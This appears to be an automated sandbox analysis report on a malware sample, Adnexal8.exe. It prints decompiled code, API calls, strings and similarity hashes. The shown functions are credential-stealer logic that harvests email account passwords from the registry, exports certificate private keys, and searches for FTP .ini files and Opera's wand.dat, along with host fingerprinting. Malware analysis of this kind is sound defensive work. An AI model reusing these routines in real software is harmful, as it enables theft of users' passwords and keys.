				_push(0x403ca4);
				L0040114C();
				_push(0);
				asm("cdq");
				_push(0x148cb63 / (__eax - 0x5c)); // executed
				E00403BE8(); // executed
				L00401146();
				return 0;
			}

0x00402fb2
0x00421a46
0x00421a4b
0x00421a53
0x00421a5d
0x00421a60
0x00421a61
0x00421a66
0x00421a6d

APIs

#696.MSVBVM60(00403CA4), ref: 00421A4B
__vbaSetSystemError.MSVBVM60(0148CB63,00000000,00403CA4), ref: 00421A66

Memory Dump Source

Source File: 0000000A.00000002.689859187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.689855403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.689873308.0000000000421000.00000020.00020000.sdmp Download File
Associated: 0000000A.00000002.689876932.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.689880429.000000000042A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.689883984.000000000042B000.00000002.00020000.sdmp Download File

Similarity

API ID: #696ErrorSystem__vba
String ID:
API String ID: 1682638366-0
Opcode ID: 2af48c794653242bd0cf104ee0e17f9b06a677a4218dcca10519411258dcfeb8
Instruction ID: cd24f5d89f5410eae393ec7b077bea812e3d8d252e5c27202905309d8a94c185
Opcode Fuzzy Hash: 2af48c794653242bd0cf104ee0e17f9b06a677a4218dcca10519411258dcfeb8
Instruction Fuzzy Hash: 5CD0223520A60129E108BEBB848AB3B29880F54F0DF20403F7200FA4D2CABC8400202F

Uniqueness

Uniqueness Score: -1.00%

Function 04B201E1, Relevance: 1.3, APIs: 1, Instructions: 61sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(0000000F,00000000,?,00000100), ref: 04B201EE

Memory Dump Source

Source File: 0000000A.00000002.690170836.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: b6e7b9debfb694aabae739e8e2bd710d8fe884214757f1165613a49155799f9e
Instruction ID: 6b619fe5903561007c33ba945a8ea2cd0f7fbb84f24d2eb671bfdc5f6933437f
Opcode Fuzzy Hash: b6e7b9debfb694aabae739e8e2bd710d8fe884214757f1165613a49155799f9e
Instruction Fuzzy Hash: D6019E12A401B977EA342E6C8F4DBFE2315FBA3759F640BC2E62E9216E99217C034241

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004218A6, Relevance: 15.1, APIs: 10, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E004218A6(void* __ebx, void* __edi, void* __esi, char __fp0, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v36;
				char _v44;
				char _v64;
				void* _t36;
				intOrPtr* _t37;
				void* _t38;
				void* _t43;
				void* _t47;
				void* _t49;
				intOrPtr* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				signed int _t63;
				signed int _t64;
				void* _t65;
				void* _t67;
				intOrPtr _t68;
				intOrPtr _t70;
				intOrPtr _t76;

				_t68 = _t67 - 0xc;
				 *[fs:0x0] = _t68;
				_v16 = _t68 - 0x44;
				_v12 = 0x4010a0;
				_t63 = _a4;
				_v8 = _t63 & 0x00000001;
				_t64 = _t63 & 0xfffffffe;
				_a4 = _t64;
				 *((intOrPtr*)( *_t64 + 4))(_t64, __edi, __esi, __ebx,  *[fs:0x0], 0x4010b6, _t65);
				_v44 = 0;
				_push( &_v44);
				_v28 = 0;
				_v64 = 0;
				_v36 = 0x80020004;
				_v44 = 0xa;
				L0040116A();
				_v64 = __fp0;
				L00401164();
				_t70 =  *0x4229d4; // 0x2961b2c
				if(_t70 == 0) {
					_push(0x4229d4);
					_push(0x403c80);
					L0040115E();
				}
				_t58 =  *0x4229d4; // 0x2961b2c
				_t36 =  *((intOrPtr*)( *_t58 + 0x4c))(_t58,  &_v28);
				asm("fclex");
				if(_t36 < 0) {
					_push(0x4c);
					_push(0x403c70);
					_push(_t58);
					_push(_t36);
					L00401158();
				}
				_t37 = _v28;
				_t59 = _t37;
				_t38 =  *((intOrPtr*)( *_t37 + 0x20))(_t37,  &_v64);
				asm("fclex");
				if(_t38 < 0) {
					_push(0x20);
					_push(0x403c90);
					_push(_t59);
					_push(_t38);
					L00401158();
				}
				L00401152();
				if( ~(0 | _v64 != 0x00000000) != 0) {
					_t49 =  *((intOrPtr*)( *_t64 + 0x6fc))(_t64);
					if(_t49 < 0) {
						_push(0x6fc);
						_push(0x403a74);
						_push(_t64);
						_push(_t49);
						L00401158();
					}
				}
				_t76 =  *0x422010; // 0x5cfb60
				if(_t76 == 0) {
					_push(0x422010);
					_push(0x402bdc);
					L0040115E();
				}
				_t61 =  *0x422010; // 0x5cfb60
				_t43 =  *((intOrPtr*)( *_t61 + 0x2b4))(_t61);
				asm("fclex");
				if(_t43 < 0) {
					_push(0x2b4);
					_push(0x403a40);
					_push(_t61);
					_push(_t43);
					L00401158();
				}
				 *((intOrPtr*)( *_t64 + 0x700))(_t64);
				_t47 =  *((intOrPtr*)( *_t64 + 0x6fc))(_t64);
				if(_t47 < 0) {
					_push(0x6fc);
					_push(0x403a74);
					_push(_t64);
					_push(_t47);
					L00401158();
				}
				_v8 = 0;
				asm("wait");
				_push(E00421A29);
				return _t47;
			}

APIs

#593.MSVBVM60(?), ref: 00421903
__vbaFreeVar.MSVBVM60(?), ref: 0042190E
__vbaNew2.MSVBVM60(00403C80,004229D4,?), ref: 00421925
__vbaHresultCheckObj.MSVBVM60(00000000,02961B2C,00403C70,0000004C), ref: 00421949
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C90,00000020), ref: 0042196C
__vbaFreeObj.MSVBVM60(00000000,?,00403C90,00000020), ref: 00421980
__vbaHresultCheckObj.MSVBVM60(00000000,004010A0,00403A74,000006FC), ref: 004219A3
__vbaNew2.MSVBVM60(00402BDC,00422010), ref: 004219BA
__vbaHresultCheckObj.MSVBVM60(00000000,005CFB60,00403A40,000002B4), ref: 004219E0
__vbaHresultCheckObj.MSVBVM60(00000000,004010A0,00403A74,000006FC), ref: 00421A07

Memory Dump Source

Source File: 0000000A.00000002.689873308.0000000000421000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.689855403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.689859187.0000000000401000.00000020.00020000.sdmp Download File
Associated: 0000000A.00000002.689876932.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.689880429.000000000042A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.689883984.000000000042B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$FreeNew2$#593
String ID:
API String ID: 734493984-0
Opcode ID: 83c8c74c4005b6d249c17afc8bbb60808a59098d24549a08e06e30d82bd268f6
Instruction ID: c2a4e496c33e5a95fca38fc57b841067e4aaf942ed9135cbc122c6ee08ed05d7
Opcode Fuzzy Hash: 83c8c74c4005b6d249c17afc8bbb60808a59098d24549a08e06e30d82bd268f6
Instruction Fuzzy Hash: 0E419FB0B00219ABCB10AFA5CC89E9E7BB9AF59704F60043BF145B72A1C7785985CB58

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Adnexal8.exe PID: 6892 Parent PID: 5600 Adnexal8.exeCOMMON

Executed Functions

Function 0040EC16, Relevance: 22.9, APIs: 3, Strings: 10, Instructions: 174
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EC16(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				char* _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				char _v2088;
				intOrPtr _v2092;
				intOrPtr _v2096;
				char _v2100;
				intOrPtr _v2104;
				intOrPtr _v2108;
				char _v2112;
				intOrPtr _v2116;
				intOrPtr _v2120;
				char _v2124;
				long _t93;
				long _t94;

				_t93 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
				_t94 = _t93;
				if(_t94 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D69(E00401D15(_a8, "\\"),  &_v2064);
						_v2072 = E00401C8E(_a4, _v2068, "EmailAddress", 0);
						_v2076 = E00401C8E(_a4, _v2068, "Technology", 0);
						_v2080 = E00401C8E(_a4, _v2068, "PopServer", 0);
						_v2084 = E00401C8E(_a4, _v2068, "PopPort",  &_v2088);
						_v2092 = E00401C8E(_a4, _v2068, "PopAccount", 0);
						_v2096 = E00401C8E(_a4, _v2068, "PopPassword",  &_v2100);
						_v2104 = E00401C8E(_a4, _v2068, "_mtpServer", 0);
						_v2108 = E00401C8E(_a4, _v2068, "_mtpPort",  &_v2112);
						_v2116 = E00401C8E(_a4, _v2068, "_mtpAccount", 0);
						_v2120 = E00401C8E(_a4, _v2068, "_mtpPassword",  &_v2124);
						if(_v2072 != 0 && (_v2100 != 0 || _v2124 != 0)) {
							E00401486(_a12, 0xbeef0000);
							E004014E8(_a12, _v2072);
							E004014E8(_a12, _v2076);
							E004014E8(_a12, _v2080);
							E004014BC(_a12, _v2084, _v2088);
							E004014E8(_a12, _v2092);
							E004014BC(_a12, _v2096, _v2100);
							E004014E8(_a12, _v2104);
							E004014BC(_a12, _v2108, _v2112);
							E004014E8(_a12, _v2116);
							E004014BC(_a12, _v2120, _v2124);
						}
						E0040EC16(_a4, _v2068, _a12);
						E004017D5(_v2068);
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004017D5(_v2080);
						E004017D5(_v2084);
						E004017D5(_v2092);
						E004017D5(_v2096);
						E004017D5(_v2104);
						E004017D5(_v2108);
						E004017D5(_v2116);
						E004017D5(_v2120);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t94;
			}

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040EC29
RegEnumKeyExA.ADVAPI32 ref: 0040EC5D
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EF18

Strings

_mtpServer, xrefs: 0040ED3B
_mtpPort, xrefs: 0040ED5B
_mtpPassword, xrefs: 0040ED96
PopPassword, xrefs: 0040ED20
_mtpAccount, xrefs: 0040ED76
Technology, xrefs: 0040ECAA
PopPort, xrefs: 0040ECE5
EmailAddress, xrefs: 0040EC8F
PopAccount, xrefs: 0040ED00
PopServer, xrefs: 0040ECC5

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$Technology$_mtpAccount$_mtpPassword$_mtpPort$_mtpServer
API String ID: 1332880857-669952401
Opcode ID: dd614440e08928df7971a556a3bfc9fdbc32906bff9ac93f75b2f841793f3445
Instruction ID: 8f7519f456700ac6ee7d3b9319165bdb56a4dd37101f5fed1b12cdcb20d8ff00
Opcode Fuzzy Hash: dd614440e08928df7971a556a3bfc9fdbc32906bff9ac93f75b2f841793f3445
Instruction Fuzzy Hash: 6171A33194011DBBDF226F51CC42BDDBAB6BF04704F1484FAB548750B5DB7A8AA1AF88

Uniqueness

Uniqueness Score: -1.00%

Function 0040D423, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 142
encryptionstringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040D423(intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				CHAR** _v16;
				CHAR* _v20;
				long* _v24;
				char _v28;
				long* _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _t48;
				int _t50;
				int _t54;
				CHAR** _t59;
				CHAR** _t62;
				CHAR** _t66;
				CHAR** _t71;
				intOrPtr _t79;
				CHAR** _t81;
				void* _t82;

				_t79 = __edx;
				_v8 = E0040150D(_a4, 0x48, 0);
				if( *0x414431 != 0 &&  *0x414435 != 0 &&  *0x41443d != 0 &&  *0x4143f9 != 0 &&  *0x4143fd != 0 &&  *0x414401 != 0 &&  *0x414405 != 0 &&  *0x414439 != 0) {
					_t48 =  *0x414431(0, 0x416057); // executed
					_v12 = _t48;
					if(_v12 != 0) {
						_t82 = 0;
						while(1) {
							_t82 =  *0x414435(_v12, _t82);
							_t94 = _t82;
							if(_t82 == 0) {
								break;
							}
							_t79 =  *((intOrPtr*)(_t82 + 0xc));
							_v16 =  *((intOrPtr*)(_t79 + 0x68));
							_t81 =  *(_t79 + 0x6c);
							__eflags = _t81;
							if(__eflags != 0) {
								while(1) {
									__eflags = _v16;
									if(__eflags == 0) {
										goto L28;
									}
									_t50 = lstrcmpA( *_t81, "2.5.29.37");
									__eflags = _t50;
									if(_t50 == 0) {
										__eflags = _t81[2];
										if(_t81[2] != 0) {
											_v20 = E004017EC(_t81[2]);
											E00401823(_t81[3], _v20, _t81[2]);
											_t54 = lstrcmpA(_v20, 0x416064);
											__eflags = _t54;
											if(_t54 == 0) {
												_t59 =  *0x41443d(_t82, 0, 0,  &_v24,  &_v28, 0);
												__eflags = _t59;
												if(_t59 != 0) {
													_t62 =  *0x4143f9(_v24, _v28,  &_v32);
													__eflags = _t62;
													if(_t62 != 0) {
														_t66 =  *0x4143fd(_v32, 0, 7, 0, 0,  &_v36);
														__eflags = _t66;
														if(_t66 != 0) {
															_v40 = E004017EC(_v36);
															_t71 =  *0x4143fd(_v32, 0, 7, 0, _v40,  &_v36);
															__eflags = _t71;
															if(_t71 != 0) {
																E00401486(_a4, 0xbeef0000);
																E004014BC(_a4,  *((intOrPtr*)(_t82 + 4)),  *((intOrPtr*)(_t82 + 8)));
																E004014BC(_a4, _v40, _v36);
															}
															E004017D5(_v40);
														}
														CryptDestroyKey(_v32);
													}
													CryptReleaseContext(_v24, 0);
												}
											}
											E004017D5(_v20);
										}
									}
									_t81 =  &(_t81[4]);
									_t40 =  &_v16;
									 *_t40 = _v16 - 1;
									__eflags =  *_t40;
								}
							}
							L28:
						}
						 *0x414439(_v12, 0);
					}
				}
				return E00401553(_t79, _t94, _a4, _v8);
			}

APIs

CertOpenSystemStoreA.CRYPT32(00000000,00416057), ref: 0040D4A9
CertEnumCertificatesInStore.CRYPT32(00000000), ref: 0040D4C2
lstrcmpA.KERNEL32(?,2.5.29.37), ref: 0040D4F3

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

lstrcmpA.KERNEL32(?,00416064,00000000,?,00000000,00000000,?,2.5.29.37), ref: 0040D52B
CryptAcquireCertificatePrivateKey.CRYPT32(00000000,00000000,00000000,?,?,00000000), ref: 0040D547
CryptGetUserKey.ADVAPI32(?,?,?), ref: 0040D55F
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,00000000,?), ref: 0040D578
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?,?), ref: 0040D59D
CryptDestroyKey.ADVAPI32(?), ref: 0040D5DB
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040D5E6
CertCloseStore.CRYPT32(00000000,00000000), ref: 0040D60E

Strings

2.5.29.37, xrefs: 0040D4EC

Memory Dump Source

Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Crypt$CertStore$Exportlstrcmp$AcquireAllocCertificateCertificatesCloseContextDestroyEnumLocalOpenPrivateReleaseSystemUser
String ID: 2.5.29.37
API String ID: 2649496969-3842544949
Opcode ID: 64adb788d90f03cf86861941f5e287a351f777ca5d64e8a737ecca4751077718
Instruction ID: b03ba2e338ee9a7ca6125fe278e81a7799858116ed9091dcfd2150a7fa4cb223
Opcode Fuzzy Hash: 64adb788d90f03cf86861941f5e287a351f777ca5d64e8a737ecca4751077718
Instruction Fuzzy Hash: 71516936900219FADF22AF90CC0ABEEBB71EB48304F148036F515751F0CB7A6995DB68

Uniqueness

Uniqueness Score: -1.00%

Function 00404C68, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 107
filestringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00404C68(void* __ecx, intOrPtr _a4, char* _a8, intOrPtr _a12) {
				struct _WIN32_FIND_DATAA _v324;
				void* _v328;
				CHAR* _v332;
				char* _v336;
				char* _t34;
				CHAR* _t38;
				void* _t42;
				char* _t61;
				char* _t62;
				void* _t66;
				signed int* _t67;
				void* _t68;

				_t66 = __ecx;
				_v332 = 0;
				_t34 = _a8;
				if(_t34 == 0 ||  *_t34 == 0) {
					L22:
					return E004017D5(_v332);
				} else {
					if(E004024D7(_a8) != 0) {
						_t38 = E00401D15(_a8, "*.*");
					} else {
						_t38 = E00401D15(_a8, "\*.*");
					}
					_v332 = _t38;
					E00401803( &_v324, 0x13e);
					_t42 = FindFirstFileA(_v332,  &_v324); // executed
					_v328 = _t42;
					if(_t42 + 1 != 0) {
						do {
							_t67 =  &_v324;
							if(( *_t67 & 0x00000010) == 0) {
								_v336 =  &(_t67[0xb]);
								if(StrStrIA(_v336, ".ini") != 0) {
									_t61 = E00401D69(E00401D15(_a8, "\\"), _v336);
									_push(_t61);
									_push(_t61);
									if(_a12 == 0) {
										_t62 = 1;
									} else {
										_t62 = StrStrIA(_t61, "Sites\\");
									}
									_pop(_t68);
									if(_t62 != 0) {
										E00404C51(_a4, _t68);
									}
									E004017D5();
								}
							} else {
								if(lstrcmpiA(0x414806,  &(_t67[0xb])) != 0) {
									if(lstrcmpiA(0x414808,  &( &_v324->cFileName)) != 0) {
										E00404C68(_t66, _a4, E00401D69(E00401D15(_a8, "\\"),  &( &_v324->cFileName)), _a12);
										E004017D5(_t56);
									}
								}
							}
						} while (FindNextFileA(_v328,  &_v324) != 0);
						FindClose(_v328);
					}
					goto L22;
				}
			}

APIs

FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,*.*,?), ref: 00404CD8
lstrcmpiA.KERNEL32(00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 00404D01
lstrcmpiA.KERNEL32(00414808,?,00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 00404D1E
FindNextFileA.KERNEL32(?,?,?,.ini,00000000,?,?,0000013E,?,*.*,?), ref: 00404DCD
FindClose.KERNEL32(?,?,?,?,.ini,00000000,?,?,0000013E,?,*.*,?), ref: 00404DE0

Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D

Strings

*.*, xrefs: 00404CA7
Sites\, xrefs: 00404D9B
\*.*, xrefs: 00404C98
.ini, xrefs: 00404D66

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
String ID: *.*$.ini$Sites\$\*.*
API String ID: 3040542784-999409347
Opcode ID: 361443fe5311b2d22f9cf9339d4b6dc14e685d45b6e12060e2e2ebf445a46234
Instruction ID: 5db4acfa8798974ae1da366c45271d1f2871770cf77317101492fac7cf3c5390
Opcode Fuzzy Hash: 361443fe5311b2d22f9cf9339d4b6dc14e685d45b6e12060e2e2ebf445a46234
Instruction Fuzzy Hash: E33163B1510109AADF21BF62DC02FEE7679AF84308F1441BBB608B50F1D77C9ED09A59

Uniqueness

Uniqueness Score: -1.00%

Function 004043DD, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 139
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E004043DD(void* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				struct _OSVERSIONINFOA _v164;
				char* _v168;
				char _v172;
				intOrPtr _v176;
				struct _SYSTEM_INFO _v212;
				struct HINSTANCE__* _v216;
				int _t51;
				intOrPtr _t65;
				intOrPtr* _t75;
				void* _t82;
				struct _SYSTEM_INFO* _t85;
				char* _t87;

				_v8 = E0040150D(_a4, 0, 0);
				E00401486(_a4, 0xbeef0001);
				E00401803( &_v164, 0x9c);
				_v164.dwOSVersionInfoSize = 0x9c;
				_t51 = GetVersionExA( &_v164);
				_t85 = 0;
				_t86 = 0;
				_t87 =  &(_v164.szCSDVersion);
				while(_t85 < 0x80) {
					__eflags =  *_t87;
					if( *_t87 == 0) {
						_t86 = 1;
					}
					_t86 = _t86;
					__eflags = _t86;
					if(_t86 != 0) {
						 *_t87 = 0;
					}
					_t87 = _t87 + 1;
					_t85 =  &(_t85->dwOemId.dwOemId);
					__eflags = _t85;
				}
				if(_t51 == 0) {
					E004014BC(_a4, 0, 0);
				} else {
					E004014BC(_a4,  &_v164, 0x9c);
				}
				E00401486(_a4, E0040424A());
				_v168 = E004017EC(0x400);
				E004014BC(_a4, _v168, GetLocaleInfoA(0x400, 0x1002, _v168, 0x3ff));
				E004014BC(_a4, _v168, GetLocaleInfoA(0x400, 0x1001, _v168, 0x3ff));
				E00401486(_a4, E004042B2()); // executed
				E0040434C(_t85, _t86); // executed
				_t65 = E00402725(_t85, _t86, "HWID",  &_v172); // executed
				_v176 = _t65;
				if(_v176 == 0 || _v172 < 0x14) {
					E004014BC(_a4, 0, 0);
				} else {
					_v172 = _v172 + 4;
					E00401486(_a4, _v172);
					_v172 = _v172 - 4;
					E00401486(_a4, 0xffffffff);
					E0040149B(_a4, _v176, _v172);
				}
				E004017D5(_v176);
				E004017D5(_v168);
				_t82 = 0;
				_v216 = GetModuleHandleA("kernel32.dll");
				if(_v216 != 0) {
					_t75 = GetProcAddress(_v216, "GetNativeSystemInfo");
					if(_t75 != 0) {
						_t86 =  &_v212;
						 *_t75( &_v212); // executed
						_t82 = 1;
					}
				}
				_t96 = _t82;
				if(_t82 == 0) {
					GetSystemInfo( &_v212);
				}
				E004014BC(_a4,  &_v212, 0x24);
				return E00401553(_t86, _t96, _a4, _v8);
			}

APIs

GetVersionExA.KERNEL32(0000009C), ref: 00404426
GetLocaleInfoA.KERNEL32(00000400,00001002,?,000003FF,00000400,?,00000000,?,00000000,00000000,0000009C), ref: 004044AB
GetLocaleInfoA.KERNEL32(00000400,00001001,?,000003FF,?,?,00000000,00000400,00001002,?,000003FF,00000400,?,00000000,?,00000000), ref: 004044D4
GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,?,00000000,00000000,HWID,?,?,00000000,?,?,00000000,00000400,00001001,?), ref: 00404589
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004045A8
GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll,?,00000000,?,00000000,00000000,HWID,?,?,00000000,?,?,00000000), ref: 004045B8
GetSystemInfo.KERNEL32(?,kernel32.dll,?,00000000,?,00000000,00000000,HWID,?,?,00000000,?,?,00000000,00000400,00001001), ref: 004045C6

Strings

GetNativeSystemInfo, xrefs: 0040459D
kernel32.dll, xrefs: 00404584
HWID, xrefs: 00404502

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Info$LocaleSystem$AddressHandleModuleNativeProcVersion
String ID: GetNativeSystemInfo$HWID$kernel32.dll
API String ID: 1787888500-92997708
Opcode ID: 74b982c3051711e6a4f82ec7bc2e3ba0a2c708dbed47e03aa435c593a8e72e59
Instruction ID: a5c158b064667e592a77a643291b10812bd144366de3c56d291d59684d6421bf
Opcode Fuzzy Hash: 74b982c3051711e6a4f82ec7bc2e3ba0a2c708dbed47e03aa435c593a8e72e59
Instruction Fuzzy Hash: 07515E71A00218BEDF217BA1CC46F9D7A75AF81308F0080BAB748750F1DBB95AD09F5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040890D, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 77
filestringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040890D(void* __ecx, intOrPtr _a4, char* _a8) {
				struct _WIN32_FIND_DATAA _v324;
				void* _v328;
				CHAR* _v332;
				char** _v336;
				char* _v340;
				char* _t30;
				void* _t36;
				int _t39;
				char* _t48;
				void* _t54;

				_t54 = __ecx;
				_v332 = 0;
				_t30 = _a8;
				if(_t30 == 0 ||  *_t30 == 0) {
					L14:
					return E004017D5(_v332);
				} else {
					_v332 = E00401D15(_a8, "\*.*");
					E00401803( &_v324, 0x13e);
					_t36 = FindFirstFileA(_v332,  &_v324); // executed
					_v328 = _t36;
					if(_t36 + 1 == 0) {
						goto L14;
					} else {
						goto L4;
					}
					do {
						L4:
						if((_v324.dwFileAttributes & 0x00000010) != 0) {
							if(lstrcmpiA(0x414806,  &( &_v324->cFileName)) != 0) {
								if(lstrcmpiA(0x414808,  &( &_v324->cFileName)) != 0) {
									_v336 =  &( &_v324->cFileName);
									_t48 = E00401D69(E00401D15(_a8, "\\"), _v336);
									_v340 = _t48;
									_push(_t48);
									if(StrStrIA(_v340, "opera") != 0) {
										E00408789(_t54, _a4, _v340, "wand.dat");
									}
									E004017D5();
								}
							}
						}
						_t39 = FindNextFileA(_v328,  &_v324); // executed
					} while (_t39 != 0);
					FindClose(_v328); // executed
					goto L14;
				}
			}

APIs

FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,\*.*), ref: 00408962
lstrcmpiA.KERNEL32(00414806,?,00000000,?,?,0000013E,?,\*.*), ref: 00408995
lstrcmpiA.KERNEL32(00414808,?,00414806,?,00000000,?,?,0000013E,?,\*.*), ref: 004089AF
StrStrIA.SHLWAPI(?,opera,00000000,00000000,?,?,004140DA,00414808,?,00414806,?,00000000,?,?,0000013E,?), ref: 004089F4
FindNextFileA.KERNEL32(?,?,00000000,?,?,0000013E,?,\*.*), ref: 00408A22
FindClose.KERNEL32(?,?,?,00000000,?,?,0000013E,?,\*.*), ref: 00408A35

Strings

opera, xrefs: 004089E9
\*.*, xrefs: 00408931
wand.dat, xrefs: 004089FD

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$Filelstrcmpi$CloseFirstNext
String ID: \*.*$opera$wand.dat
API String ID: 3663067366-3278183560
Opcode ID: 1bd784044f2d9d81a96e3d763f7a4310ff7d8f45acf7507539dad856e19f9394
Instruction ID: c71bf560eb1c7fb0c09b774ce167880e188dc30df44f9e3f007173dba5e297e0
Opcode Fuzzy Hash: 1bd784044f2d9d81a96e3d763f7a4310ff7d8f45acf7507539dad856e19f9394
Instruction Fuzzy Hash: BF312C7190011DAADF61AB61CD42BED7775AF44308F1440ABB54CB61B1DA789EC08F59

Uniqueness

Uniqueness Score: -1.00%

Function 00403F86, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 117
filestringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00403F86(void* __ecx, intOrPtr _a4, char* _a8, char* _a12, intOrPtr _a16, intOrPtr _a20) {
				struct _WIN32_FIND_DATAA _v324;
				void* _v328;
				CHAR* _v332;
				char* _v336;
				char* _t44;
				CHAR* _t48;
				void* _t52;
				int _t58;
				void* _t67;
				void* _t73;
				void* _t77;
				signed int* _t78;

				_t77 = __ecx;
				_v332 = 0;
				_t44 = _a8;
				if(_t44 == 0 ||  *_t44 == 0) {
					L25:
					return E004017D5(_v332);
				} else {
					if(E004024D7(_a8) != 0) {
						_t48 = E00401D15(_a8, "*.*");
					} else {
						_t48 = E00401D15(_a8, "\*.*");
					}
					_v332 = _t48;
					E00401803( &_v324, 0x13e);
					_t52 = FindFirstFileA(_v332,  &_v324); // executed
					_v328 = _t52;
					if(_t52 + 1 != 0) {
						do {
							_t78 =  &_v324;
							if(( *_t78 & 0x00000010) == 0) {
								_v336 =  &(_t78[0xb]);
								if(_a12 != 0) {
									if(StrStrIA(_v336, _a12) == 0) {
										goto L23;
									}
									L19:
									_t73 = E00401D69(E00401D15(_a8, "\\"), _v336);
									_push(_t73);
									if(_a20 == 0) {
										E00403E4C(_a4, _t73, _a16);
									} else {
										_a20(_a4, _t73, _a16);
									}
									E004017D5();
									goto L23;
								}
								goto L19;
							}
							if(lstrcmpiA(0x414806,  &(_t78[0xb])) != 0) {
								if(lstrcmpiA(0x414808,  &( &_v324->cFileName)) != 0) {
									if(E004024D7(_a8) != 0) {
										_t67 = E00401D15(_a8, 0);
									} else {
										_t67 = E00401D15(_a8, "\\"); // executed
									}
									E00403F86(_t77, _a4, E00401D69(_t67,  &( &_v324->cFileName)), _a12, _a16, _a20); // executed
									E004017D5(_t68);
								}
							}
							L23:
							_t58 = FindNextFileA(_v328,  &_v324); // executed
						} while (_t58 != 0);
						FindClose(_v328); // executed
					}
					goto L25;
				}
			}

APIs

FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,*.*,?), ref: 00403FF6
